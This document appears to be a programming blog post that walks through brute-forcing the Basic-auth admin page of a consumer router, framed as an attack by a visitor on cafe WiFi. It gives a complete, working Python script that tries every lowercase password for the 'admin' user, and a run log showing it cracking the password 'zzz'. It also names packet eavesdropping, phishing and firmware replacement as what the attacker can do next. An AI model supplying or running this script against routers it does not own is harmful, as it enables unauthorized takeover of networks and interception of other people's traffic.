[PYTHON] Brute force attack on router management page

background

WiFi networks provided by schools and cafes are often in a state where the management screen page can be opened with 192.168.X.1 even from the user's terminal. Of course, a password is required, but a brute force attack may identify the password. This will allow you to enter the management screen, place any firmware, and do whatever you want with packet eavesdropping and phishing. The SNS password you typed at the cafe you went to yesterday may be exposed to the darknet now ...

Overview

This time, I will set a brute force attack on the management screen of ELECOM's Basic authentication and try to identify the password.

environment

Confirmation before attack

Suppose a privately run cafe offers a home WiFi router as an access point. Visitors access WiFi using the password written on the menu table. Of course, attackers can also access it. The attacker will check his IP by typing the following command.


waru@waru-PC:~$ ifconfig
wlo1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.2.100  netmask 255.255.255.0  broadcast 192.168.2.255

My IP is 192.168.2.100. This means that the URL of the router management page must be "http://192.168.2.1". This is because most routers have an administration page on subnet 1. When I opened it in a browser, it was displayed as follows. Screenshot from 2019-12-31 01-13-38.png

Even at this point, you may be able to access it by typing [user: admin pass: admin], but this time it was useless. The following code comes into play.

code

It is a code that fixes user to admin, sequentially generates all combinations of lowercase letters as a password while increasing the character length, and tries to access by that user and pass.

router_admin_brute_force.py


import requests
import string
import numpy as np

target_ip = 'http://192.168.2.1/'

def access(user: str, password: str):
    response = requests.get(target_ip, auth=(user, password))
    if response.status_code == 401:
        raise ConnectionError
    if "please try" in response.text:
        raise ConnectionError

chars = ["0"] + list(string.ascii_lowercase)

# ref:https://stackoverflow.com/questions/2267362/how-to-convert-an-integer-in-any-base-to-a-string
digs = chars
def int2base(x, base):
    digits = []

    while x:
        digits.append(digs[int(x % base)])
        x = int(x / base)

    digits.reverse()

    return ''.join(digits)

i = 0
while True:
    i += 1
    password = int2base(i,len(chars))
    try:
        access(user="admin", password=password)
    except:
        pass
    else:
        print(f"success:{password}")
        break

Execution result


waru@waru-PC:~/Programs/router_hack$ python3 router_admin_brute_force.py 
success:zzz

A password called zzz has been identified. Let's type in "http://192.168.2.1".

Screenshot from 2019-12-31 01-52-33.png

I put it in. After that, it's boiled or baked ...

Consideration

This time I intentionally set a short password called zzz on the router, but the specific time with the above code was still 10 minutes. Moreover, since it does not consider uppercase letters, numbers and special characters, the execution time will be enormous if they are combined. However, the above code may not be optimal, so this is not yet a timely impractical attack method. You may find improvements by profiling the code. For the time being, this time is the end.

Recommended Posts

Brute force attack on router management page
NAT router on Linux